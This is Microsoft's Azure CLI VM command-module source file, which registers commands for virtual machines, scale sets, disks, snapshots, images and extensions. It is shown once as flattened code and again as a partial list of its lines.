ResourceType # pylint: disable=line-too-long custom_path = 'azure.cli.command_modules.vm.custom#{}' mgmt_path = 'azure.mgmt.compute.compute.operations.{}#{}.{}' # VM def transform_ip_addresses(result): transformed = [] for r in result: network = r['virtualMachine']['network'] public = network.get('publicIpAddresses') public_ip_addresses = ','.join([p['ipAddress'] for p in public if p['ipAddress']]) if public else None private = network.get('privateIpAddresses') private_ip_addresses = ','.join(private) if private else None entry = OrderedDict([('virtualMachine', r['virtualMachine']['name']), ('publicIPAddresses', public_ip_addresses), ('privateIPAddresses', private_ip_addresses)]) transformed.append(entry) return transformed def transform_vm(result): return OrderedDict([('name', result['name']), ('resourceGroup', result['resourceGroup']), ('powerState', result.get('powerState')), ('publicIps', result.get('publicIps')), ('fqdns', result.get('fqdns')), ('location', result['location'])]) def 
transform_vm_create_output(result): from azure.cli.core.commands.arm import parse_resource_id try: output = OrderedDict([('id', result.id), ('resourceGroup', getattr(result, 'resource_group', None) or parse_resource_id(result.id)['resource_group']), ('powerState', result.power_state), ('publicIpAddress', result.public_ips), ('fqdns', result.fqdns), ('privateIpAddress', result.private_ips), ('macAddress', result.mac_addresses), ('location', result.location)]) if getattr(result, 'identity', None): output['identity'] = result.identity return output except AttributeError: from msrest.pipeline import ClientRawResponse return None if isinstance(result, ClientRawResponse) else result def transform_vm_usage_list(result): result = list(result) for item in result: item.current_value = str(item.current_value) item.limit = str(item.limit) item.local_name = item.name.localized_value return result def transform_vm_list(vm_list): return [transform_vm(v) for v in vm_list] # flattern out important fields (single member arrays) to be displayed in the table output def transform_sku_for_table_output(skus): result = [] for k in skus: order_dict = OrderedDict() order_dict['resourceType'] = k['resourceType'] order_dict['locations'] = str(k['locations']) if len(k['locations']) > 1 else k['locations'][0] order_dict['name'] = k['name'] order_dict['size'] = k['size'] order_dict['tier'] = k['tier'] if k['capabilities']: temp = ['{}={}'.format(pair['name'], pair['value']) for pair in k['capabilities']] order_dict['capabilities'] = str(temp) if len(temp) > 1 else temp[0] else: order_dict['capabilities'] = None if k['restrictions']: reasons = [x['reasonCode'] for x in k['restrictions']] order_dict['restrictions'] = str(reasons) if len(reasons) > 1 else reasons[0] else: order_dict['restrictions'] = None result.append(order_dict) return result op_var = 'virtual_machines_operations' op_class = 'VirtualMachinesOperations' cli_command(__name__, 'vm create', custom_path.format('create_vm'), 
transform=transform_vm_create_output, no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format) cli_command(__name__, 'vm delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm, confirmation=True, no_wait_param='raw') cli_command(__name__, 'vm deallocate', mgmt_path.format(op_var, op_class, 'deallocate'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm generalize', mgmt_path.format(op_var, op_class, 'generalize'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm show', custom_path.format('show_vm'), table_transformer=transform_vm, exception_handler=empty_on_404) cli_command(__name__, 'vm list-vm-resize-options', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_vm) cli_command(__name__, 'vm stop', mgmt_path.format(op_var, op_class, 'power_off'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm restart', mgmt_path.format(op_var, op_class, 'restart'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm start', mgmt_path.format(op_var, op_class, 'start'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm redeploy', mgmt_path.format(op_var, op_class, 'redeploy'), cf_vm, no_wait_param='raw') cli_command(__name__, 'vm list-ip-addresses', custom_path.format('list_ip_addresses'), table_transformer=transform_ip_addresses) cli_command(__name__, 'vm get-instance-view', custom_path.format('get_instance_view'), table_transformer='{Name:name, ResourceGroup:resourceGroup, Location:location, ProvisioningState:provisioningState, PowerState:instanceView.statuses[1].displayStatus}') cli_command(__name__, 'vm list', custom_path.format('list_vm'), table_transformer=transform_vm_list) cli_command(__name__, 'vm resize', custom_path.format('resize_vm'), no_wait_param='no_wait') cli_command(__name__, 'vm capture', custom_path.format('capture_vm')) cli_command(__name__, 'vm open-port', custom_path.format('vm_open_port')) cli_command(__name__, 'vm format-secret', 
custom_path.format('get_vm_format_secret')) cli_generic_update_command(__name__, 'vm update', mgmt_path.format(op_var, op_class, 'get'), mgmt_path.format(op_var, op_class, 'create_or_update'), cf_vm, no_wait_param='raw') cli_generic_wait_command(__name__, 'vm wait', 'azure.cli.command_modules.vm.custom#get_instance_view') if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'): cli_command(__name__, 'vm convert', mgmt_path.format(op_var, op_class, 'convert_to_managed_disks'), cf_vm) # VM encryption cli_command(__name__, 'vm encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vm') cli_command(__name__, 'vm encryption disable', 'azure.cli.command_modules.vm.disk_encryption#decrypt_vm') cli_command(__name__, 'vm encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vm_encryption_status', exception_handler=empty_on_404) # VMSS encryption if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vmss encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vmss') cli_command(__name__, 'vmss encryption disable', 'azure.cli.command_modules.vm.disk_encryption#decrypt_vmss') cli_command(__name__, 'vmss encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vmss_encryption_status', exception_handler=empty_on_404) # VM NIC cli_command(__name__, 'vm nic add', custom_path.format('vm_add_nics')) cli_command(__name__, 'vm nic remove', custom_path.format('vm_remove_nics')) cli_command(__name__, 'vm nic set', custom_path.format('vm_set_nics')) cli_command(__name__, 'vm nic show', custom_path.format('vm_show_nic'), exception_handler=empty_on_404) cli_command(__name__, 'vm nic list', custom_path.format('vm_list_nics')) # VMSS NIC cli_command(__name__, 'vmss nic list', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_network_interfaces', cf_ni) cli_command(__name__, 'vmss nic 
list-vm-nics', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_vm_network_interfaces', cf_ni) cli_command(__name__, 'vmss nic show', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.get_virtual_machine_scale_set_network_interface', cf_ni, exception_handler=empty_on_404) # VM Access cli_command(__name__, 'vm user update', custom_path.format('set_user'), no_wait_param='no_wait') cli_command(__name__, 'vm user delete', custom_path.format('delete_user'), no_wait_param='no_wait') cli_command(__name__, 'vm user reset-ssh', custom_path.format('reset_linux_ssh'), no_wait_param='no_wait') # # VM Availability Set cli_command(__name__, 'vm availability-set create', custom_path.format('create_av_set'), exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format, no_wait_param='no_wait') op_var = 'availability_sets_operations' op_class = 'AvailabilitySetsOperations' cli_command(__name__, 'vm availability-set delete', mgmt_path.format(op_var, op_class, 'delete'), cf_avail_set) cli_command(__name__, 'vm availability-set show', mgmt_path.format(op_var, op_class, 'get'), cf_avail_set, exception_handler=empty_on_404) cli_command(__name__, 'vm availability-set list', mgmt_path.format(op_var, op_class, 'list'), cf_avail_set) cli_command(__name__, 'vm availability-set list-sizes', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_avail_set) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'): cli_command(__name__, 'vm availability-set convert', custom_path.format('convert_av_set_to_managed_disk')) cli_generic_update_command(__name__, 'vm availability-set update', custom_path.format('availset_get'), custom_path.format('availset_set')) cli_generic_update_command(__name__, 'vmss update', custom_path.format('vmss_get'), custom_path.format('vmss_set'), no_wait_param='no_wait') 
cli_generic_wait_command(__name__, 'vmss wait', custom_path.format('vmss_get')) # VM Boot Diagnostics cli_command(__name__, 'vm boot-diagnostics disable', custom_path.format('disable_boot_diagnostics')) cli_command(__name__, 'vm boot-diagnostics enable', custom_path.format('enable_boot_diagnostics')) cli_command(__name__, 'vm boot-diagnostics get-boot-log', custom_path.format('get_boot_log')) # VM Diagnostics cli_command(__name__, 'vm diagnostics set', custom_path.format('set_diagnostics_extension')) cli_command(__name__, 'vm diagnostics get-default-config', custom_path.format('show_default_diagnostics_configuration')) # VMSS Diagnostics cli_command(__name__, 'vmss diagnostics set', custom_path.format('set_vmss_diagnostics_extension')) cli_command(__name__, 'vmss diagnostics get-default-config', custom_path.format('show_default_diagnostics_configuration')) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vm disk attach', custom_path.format('attach_managed_data_disk')) cli_command(__name__, 'vm disk detach', custom_path.format('detach_data_disk')) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vmss disk attach', custom_path.format('attach_managed_data_disk_to_vmss')) cli_command(__name__, 'vmss disk detach', custom_path.format('detach_disk_from_vmss')) cli_command(__name__, 'vm unmanaged-disk attach', custom_path.format('attach_unmanaged_data_disk')) cli_command(__name__, 'vm unmanaged-disk detach', custom_path.format('detach_data_disk')) cli_command(__name__, 'vm unmanaged-disk list', custom_path.format('list_unmanaged_disks')) # VM Extension op_var = 'virtual_machine_extensions_operations' op_class = 'VirtualMachineExtensionsOperations' cli_command(__name__, 'vm extension delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm_ext) _extension_show_transform = '{Name:name, ProvisioningState:provisioningState, Publisher:publisher, Version:typeHandlerVersion, 
AutoUpgradeMinorVersion:autoUpgradeMinorVersion}' cli_command(__name__, 'vm extension show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext, exception_handler=empty_on_404, table_transformer=_extension_show_transform) cli_command(__name__, 'vm extension set', custom_path.format('set_extension')) cli_command(__name__, 'vm extension list', custom_path.format('list_extensions'), table_transformer='[].' + _extension_show_transform) # VMSS Extension cli_command(__name__, 'vmss extension delete', custom_path.format('delete_vmss_extension')) cli_command(__name__, 'vmss extension show', custom_path.format('get_vmss_extension'), exception_handler=empty_on_404) cli_command(__name__, 'vmss extension set', custom_path.format('set_vmss_extension')) cli_command(__name__, 'vmss extension list', custom_path.format('list_vmss_extensions')) # VM Extension Image op_var = 'virtual_machine_extension_images_operations' op_class = 'VirtualMachineExtensionImagesOperations' cli_command(__name__, 'vm extension image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext_image, exception_handler=empty_on_404) cli_command(__name__, 'vm extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image) cli_command(__name__, 'vm extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image) cli_command(__name__, 'vm extension image list', custom_path.format('list_vm_extension_images')) # VMSS Extension Image (convenience copy of VM Extension Image) cli_command(__name__, 'vmss extension image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext_image, exception_handler=empty_on_404) cli_command(__name__, 'vmss extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image) cli_command(__name__, 'vmss extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image) cli_command(__name__, 'vmss extension image list', 
custom_path.format('list_vm_extension_images')) # VM Image op_var = 'virtual_machine_images_operations' op_class = 'VirtualMachineImagesOperations' cli_command(__name__, 'vm image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_image, exception_handler=empty_on_404) cli_command(__name__, 'vm image list-offers', mgmt_path.format(op_var, op_class, 'list_offers'), cf_vm_image) cli_command(__name__, 'vm image list-publishers', mgmt_path.format(op_var, op_class, 'list_publishers'), cf_vm_image) cli_command(__name__, 'vm image list-skus', mgmt_path.format(op_var, op_class, 'list_skus'), cf_vm_image) cli_command(__name__, 'vm image list', custom_path.format('list_vm_images')) # VM Usage cli_command(__name__, 'vm list-usage', mgmt_path.format('usage_operations', 'UsageOperations', 'list'), cf_usage, transform=transform_vm_usage_list, table_transformer='[].{Name:localName, CurrentValue:currentValue, Limit:limit}') # VMSS vmss_show_table_transform = '{Name:name, ResourceGroup:resourceGroup, Location:location, Capacity:sku.capacity, Overprovision:overprovision, upgradePolicy:upgradePolicy.mode}' cli_command(__name__, 'vmss delete', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'delete'), cf_vmss, no_wait_param='raw') cli_command(__name__, 'vmss list-skus', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'list_skus'), cf_vmss) cli_command(__name__, 'vmss list-instances', mgmt_path.format('virtual_machine_scale_set_vms_operations', 'VirtualMachineScaleSetVMsOperations', 'list'), cf_vmss_vm) cli_command(__name__, 'vmss create', custom_path.format('create_vmss'), transform=DeploymentOutputLongRunningOperation('Starting vmss create'), no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format) cli_command(__name__, 'vmss deallocate', custom_path.format('deallocate_vmss'), no_wait_param='no_wait') 
cli_command(__name__, 'vmss delete-instances', custom_path.format('delete_vmss_instances'), no_wait_param='no_wait') cli_command(__name__, 'vmss get-instance-view', custom_path.format('get_vmss_instance_view'), table_transformer='{ProvisioningState:statuses[0].displayStatus, PowerState:statuses[1].displayStatus}') cli_command(__name__, 'vmss show', custom_path.format('show_vmss'), exception_handler=empty_on_404, table_transformer=vmss_show_table_transform) cli_command(__name__, 'vmss list', custom_path.format('list_vmss'), table_transformer='[].' + vmss_show_table_transform) cli_command(__name__, 'vmss stop', custom_path.format('stop_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss restart', custom_path.format('restart_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss start', custom_path.format('start_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss update-instances', custom_path.format('update_vmss_instances'), no_wait_param='no_wait') if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vmss reimage', custom_path.format('reimage_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss scale', custom_path.format('scale_vmss'), no_wait_param='no_wait') cli_command(__name__, 'vmss list-instance-connection-info', custom_path.format('list_vmss_instance_connection_info')) cli_command(__name__, 'vmss list-instance-public-ips', custom_path.format('list_vmss_instance_public_ips')) # VM Size cli_command(__name__, 'vm list-sizes', mgmt_path.format('virtual_machine_sizes_operations', 'VirtualMachineSizesOperations', 'list'), cf_vm_sizes) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): # VM Disk op_var = 'disks_operations' op_class = 'DisksOperations' cli_command(__name__, 'disk create', custom_path.format('create_managed_disk'), no_wait_param='no_wait') cli_command(__name__, 'disk list', custom_path.format('list_managed_disks')) cli_command(__name__, 'disk show', 
mgmt_path.format(op_var, op_class, 'get'), cf_disks, exception_handler=empty_on_404) cli_command(__name__, 'disk delete', mgmt_path.format(op_var, op_class, 'delete'), cf_disks, no_wait_param='raw', confirmation=True) cli_command(__name__, 'disk grant-access', custom_path.format('grant_disk_access')) cli_command(__name__, 'disk revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_disks) cli_generic_update_command(__name__, 'disk update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class), custom_function_op=custom_path.format('update_managed_disk'), setter_arg_name='disk', factory=cf_disks, no_wait_param='raw') cli_generic_wait_command(__name__, 'disk wait', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), cf_disks) op_var = 'snapshots_operations' op_class = 'SnapshotsOperations' cli_command(__name__, 'snapshot create', custom_path.format('create_snapshot')) cli_command(__name__, 'snapshot list', custom_path.format('list_snapshots')) cli_command(__name__, 'snapshot show', mgmt_path.format(op_var, op_class, 'get'), cf_snapshots, exception_handler=empty_on_404) cli_command(__name__, 'snapshot delete', mgmt_path.format(op_var, op_class, 'delete'), cf_snapshots) cli_command(__name__, 'snapshot grant-access', custom_path.format('grant_snapshot_access')) cli_command(__name__, 'snapshot revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_snapshots) cli_generic_update_command(__name__, 'snapshot update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class), custom_function_op=custom_path.format('update_snapshot'), setter_arg_name='snapshot', factory=cf_snapshots) op_var = 'images_operations' op_class = 'ImagesOperations' cli_command(__name__, 'image create', 
custom_path.format('create_image')) cli_command(__name__, 'image list', custom_path.format('list_images')) cli_command(__name__, 'image show', mgmt_path.format(op_var, op_class, 'get'), cf_images, exception_handler=empty_on_404) cli_command(__name__, 'image delete', mgmt_path.format(op_var, op_class, 'delete'), cf_images) if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'): cli_command(__name__, 'vm list-skus', custom_path.format('list_skus'), table_transformer=transform_sku_for_table_output) op_var = 'virtual_machine_run_commands_operations' op_class = 'VirtualMachineRunCommandsOperations' cli_command(__name__, 'vm run-command show', mgmt_path.format(op_var, op_class, 'get'), cf_run_commands) cli_command(__name__, 'vm run-command list', mgmt_path.format(op_var, op_class, 'list'), cf_run_commands) cli_command(__name__, 'vm run-command invoke', custom_path.format('run_command_invoke')) # MSI cli_command(__name__, 'vm assign-identity', custom_path.format('assign_vm_identity')) cli_command(__name__, 'vmss assign-identity', custom_path.format('assign_vmss_identity'))
[ "# --------------------------------------------------------------------------------------------\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "# Licensed under the MIT License. See License.txt in the project root for license information.\n", "# --------------------------------------------------------------------------------------------\n", "\n", "from collections import OrderedDict\n", "\n", "from azure.cli.command_modules.vm._client_factory import (cf_vm, cf_avail_set, cf_ni,\n", " cf_vm_ext,\n", " cf_vm_ext_image, cf_vm_image, cf_usage,\n", " cf_vmss, cf_vmss_vm,\n", " cf_vm_sizes, cf_disks, cf_snapshots,\n", " cf_images, cf_run_commands)\n", "from azure.cli.core.commands import DeploymentOutputLongRunningOperation, cli_command\n", "from azure.cli.core.commands.arm import \\\n", " (cli_generic_update_command, cli_generic_wait_command, handle_long_running_operation_exception,\n", " deployment_validate_table_format)\n", "from azure.cli.core.util import empty_on_404\n", "from azure.cli.core.profiles import supported_api_version, ResourceType\n", "\n", "# pylint: disable=line-too-long\n", "\n", "custom_path = 'azure.cli.command_modules.vm.custom#{}'\n", "mgmt_path = 'azure.mgmt.compute.compute.operations.{}#{}.{}'\n", "\n", "\n", "# VM\n", "def transform_ip_addresses(result):\n", " transformed = []\n", " for r in result:\n", " network = r['virtualMachine']['network']\n", " public = network.get('publicIpAddresses')\n", " public_ip_addresses = ','.join([p['ipAddress'] for p in public if p['ipAddress']]) if public else None\n", " private = network.get('privateIpAddresses')\n", " private_ip_addresses = ','.join(private) if private else None\n", " entry = OrderedDict([('virtualMachine', r['virtualMachine']['name']),\n", " ('publicIPAddresses', public_ip_addresses),\n", " ('privateIPAddresses', private_ip_addresses)])\n", " transformed.append(entry)\n", "\n", " return transformed\n", "\n", "\n", "def transform_vm(result):\n", " return 
OrderedDict([('name', result['name']),\n", " ('resourceGroup', result['resourceGroup']),\n", " ('powerState', result.get('powerState')),\n", " ('publicIps', result.get('publicIps')),\n", " ('fqdns', result.get('fqdns')),\n", " ('location', result['location'])])\n", "\n", "\n", "def transform_vm_create_output(result):\n", " from azure.cli.core.commands.arm import parse_resource_id\n", " try:\n", " output = OrderedDict([('id', result.id),\n", " ('resourceGroup', getattr(result, 'resource_group', None) or parse_resource_id(result.id)['resource_group']),\n", " ('powerState', result.power_state),\n", " ('publicIpAddress', result.public_ips),\n", " ('fqdns', result.fqdns),\n", " ('privateIpAddress', result.private_ips),\n", " ('macAddress', result.mac_addresses),\n", " ('location', result.location)])\n", " if getattr(result, 'identity', None):\n", " output['identity'] = result.identity\n", " return output\n", " except AttributeError:\n", " from msrest.pipeline import ClientRawResponse\n", " return None if isinstance(result, ClientRawResponse) else result\n", "\n", "\n", "def transform_vm_usage_list(result):\n", " result = list(result)\n", " for item in result:\n", " item.current_value = str(item.current_value)\n", " item.limit = str(item.limit)\n", " item.local_name = item.name.localized_value\n", " return result\n", "\n", "\n", "def transform_vm_list(vm_list):\n", " return [transform_vm(v) for v in vm_list]\n", "\n", "\n", "# flattern out important fields (single member arrays) to be displayed in the table output\n", "def transform_sku_for_table_output(skus):\n", " result = []\n", " for k in skus:\n", " order_dict = OrderedDict()\n", " order_dict['resourceType'] = k['resourceType']\n", " order_dict['locations'] = str(k['locations']) if len(k['locations']) > 1 else k['locations'][0]\n", " order_dict['name'] = k['name']\n", " order_dict['size'] = k['size']\n", " order_dict['tier'] = k['tier']\n", " if k['capabilities']:\n", " temp = ['{}={}'.format(pair['name'], 
pair['value']) for pair in k['capabilities']]\n", " order_dict['capabilities'] = str(temp) if len(temp) > 1 else temp[0]\n", " else:\n", " order_dict['capabilities'] = None\n", " if k['restrictions']:\n", " reasons = [x['reasonCode'] for x in k['restrictions']]\n", " order_dict['restrictions'] = str(reasons) if len(reasons) > 1 else reasons[0]\n", " else:\n", " order_dict['restrictions'] = None\n", " result.append(order_dict)\n", " return result\n", "\n", "\n", "op_var = 'virtual_machines_operations'\n", "op_class = 'VirtualMachinesOperations'\n", "cli_command(__name__, 'vm create', custom_path.format('create_vm'), transform=transform_vm_create_output, no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format)\n", "cli_command(__name__, 'vm delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm, confirmation=True, no_wait_param='raw')\n", "cli_command(__name__, 'vm deallocate', mgmt_path.format(op_var, op_class, 'deallocate'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm generalize', mgmt_path.format(op_var, op_class, 'generalize'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm show', custom_path.format('show_vm'), table_transformer=transform_vm, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm list-vm-resize-options', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_vm)\n", "cli_command(__name__, 'vm stop', mgmt_path.format(op_var, op_class, 'power_off'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm restart', mgmt_path.format(op_var, op_class, 'restart'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm start', mgmt_path.format(op_var, op_class, 'start'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm redeploy', mgmt_path.format(op_var, op_class, 'redeploy'), cf_vm, no_wait_param='raw')\n", "cli_command(__name__, 'vm list-ip-addresses', custom_path.format('list_ip_addresses'), 
table_transformer=transform_ip_addresses)\n", "cli_command(__name__, 'vm get-instance-view', custom_path.format('get_instance_view'),\n", " table_transformer='{Name:name, ResourceGroup:resourceGroup, Location:location, ProvisioningState:provisioningState, PowerState:instanceView.statuses[1].displayStatus}')\n", "cli_command(__name__, 'vm list', custom_path.format('list_vm'), table_transformer=transform_vm_list)\n", "cli_command(__name__, 'vm resize', custom_path.format('resize_vm'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vm capture', custom_path.format('capture_vm'))\n", "cli_command(__name__, 'vm open-port', custom_path.format('vm_open_port'))\n", "cli_command(__name__, 'vm format-secret', custom_path.format('get_vm_format_secret'))\n", "cli_generic_update_command(__name__, 'vm update',\n", " mgmt_path.format(op_var, op_class, 'get'),\n", " mgmt_path.format(op_var, op_class, 'create_or_update'),\n", " cf_vm,\n", " no_wait_param='raw')\n", "cli_generic_wait_command(__name__, 'vm wait', 'azure.cli.command_modules.vm.custom#get_instance_view')\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'):\n", " cli_command(__name__, 'vm convert', mgmt_path.format(op_var, op_class, 'convert_to_managed_disks'), cf_vm)\n", "\n", "# VM encryption\n", "cli_command(__name__, 'vm encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vm')\n", "cli_command(__name__, 'vm encryption disable', 'azure.cli.command_modules.vm.disk_encryption#decrypt_vm')\n", "cli_command(__name__, 'vm encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vm_encryption_status', exception_handler=empty_on_404)\n", "\n", "# VMSS encryption\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vmss encryption enable', 'azure.cli.command_modules.vm.disk_encryption#encrypt_vmss')\n", " cli_command(__name__, 'vmss encryption disable', 
'azure.cli.command_modules.vm.disk_encryption#decrypt_vmss')\n", " cli_command(__name__, 'vmss encryption show', 'azure.cli.command_modules.vm.disk_encryption#show_vmss_encryption_status', exception_handler=empty_on_404)\n", "\n", "# VM NIC\n", "cli_command(__name__, 'vm nic add', custom_path.format('vm_add_nics'))\n", "cli_command(__name__, 'vm nic remove', custom_path.format('vm_remove_nics'))\n", "cli_command(__name__, 'vm nic set', custom_path.format('vm_set_nics'))\n", "cli_command(__name__, 'vm nic show', custom_path.format('vm_show_nic'), exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm nic list', custom_path.format('vm_list_nics'))\n", "\n", "# VMSS NIC\n", "cli_command(__name__, 'vmss nic list', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_network_interfaces', cf_ni)\n", "cli_command(__name__, 'vmss nic list-vm-nics', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.list_virtual_machine_scale_set_vm_network_interfaces', cf_ni)\n", "cli_command(__name__, 'vmss nic show', 'azure.mgmt.network.operations.network_interfaces_operations#NetworkInterfacesOperations.get_virtual_machine_scale_set_network_interface', cf_ni, exception_handler=empty_on_404)\n", "\n", "# VM Access\n", "cli_command(__name__, 'vm user update', custom_path.format('set_user'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vm user delete', custom_path.format('delete_user'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vm user reset-ssh', custom_path.format('reset_linux_ssh'), no_wait_param='no_wait')\n", "\n", "# # VM Availability Set\n", "cli_command(__name__, 'vm availability-set create', custom_path.format('create_av_set'), exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format, no_wait_param='no_wait')\n", "\n", "op_var = 'availability_sets_operations'\n", "op_class = 
'AvailabilitySetsOperations'\n", "cli_command(__name__, 'vm availability-set delete', mgmt_path.format(op_var, op_class, 'delete'), cf_avail_set)\n", "cli_command(__name__, 'vm availability-set show', mgmt_path.format(op_var, op_class, 'get'), cf_avail_set, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm availability-set list', mgmt_path.format(op_var, op_class, 'list'), cf_avail_set)\n", "cli_command(__name__, 'vm availability-set list-sizes', mgmt_path.format(op_var, op_class, 'list_available_sizes'), cf_avail_set)\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2016-04-30-preview'):\n", " cli_command(__name__, 'vm availability-set convert', custom_path.format('convert_av_set_to_managed_disk'))\n", "\n", "cli_generic_update_command(__name__, 'vm availability-set update',\n", " custom_path.format('availset_get'),\n", " custom_path.format('availset_set'))\n", "\n", "cli_generic_update_command(__name__, 'vmss update',\n", " custom_path.format('vmss_get'),\n", " custom_path.format('vmss_set'),\n", " no_wait_param='no_wait')\n", "cli_generic_wait_command(__name__, 'vmss wait', custom_path.format('vmss_get'))\n", "\n", "# VM Boot Diagnostics\n", "cli_command(__name__, 'vm boot-diagnostics disable', custom_path.format('disable_boot_diagnostics'))\n", "cli_command(__name__, 'vm boot-diagnostics enable', custom_path.format('enable_boot_diagnostics'))\n", "cli_command(__name__, 'vm boot-diagnostics get-boot-log', custom_path.format('get_boot_log'))\n", "\n", "# VM Diagnostics\n", "cli_command(__name__, 'vm diagnostics set', custom_path.format('set_diagnostics_extension'))\n", "cli_command(__name__, 'vm diagnostics get-default-config', custom_path.format('show_default_diagnostics_configuration'))\n", "\n", "# VMSS Diagnostics\n", "cli_command(__name__, 'vmss diagnostics set', custom_path.format('set_vmss_diagnostics_extension'))\n", "cli_command(__name__, 'vmss diagnostics get-default-config', 
custom_path.format('show_default_diagnostics_configuration'))\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vm disk attach', custom_path.format('attach_managed_data_disk'))\n", " cli_command(__name__, 'vm disk detach', custom_path.format('detach_data_disk'))\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vmss disk attach', custom_path.format('attach_managed_data_disk_to_vmss'))\n", " cli_command(__name__, 'vmss disk detach', custom_path.format('detach_disk_from_vmss'))\n", "\n", "cli_command(__name__, 'vm unmanaged-disk attach', custom_path.format('attach_unmanaged_data_disk'))\n", "cli_command(__name__, 'vm unmanaged-disk detach', custom_path.format('detach_data_disk'))\n", "cli_command(__name__, 'vm unmanaged-disk list', custom_path.format('list_unmanaged_disks'))\n", "\n", "# VM Extension\n", "op_var = 'virtual_machine_extensions_operations'\n", "op_class = 'VirtualMachineExtensionsOperations'\n", "cli_command(__name__, 'vm extension delete', mgmt_path.format(op_var, op_class, 'delete'), cf_vm_ext)\n", "_extension_show_transform = '{Name:name, ProvisioningState:provisioningState, Publisher:publisher, Version:typeHandlerVersion, AutoUpgradeMinorVersion:autoUpgradeMinorVersion}'\n", "cli_command(__name__, 'vm extension show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext, exception_handler=empty_on_404,\n", " table_transformer=_extension_show_transform)\n", "cli_command(__name__, 'vm extension set', custom_path.format('set_extension'))\n", "cli_command(__name__, 'vm extension list', custom_path.format('list_extensions'),\n", " table_transformer='[].' 
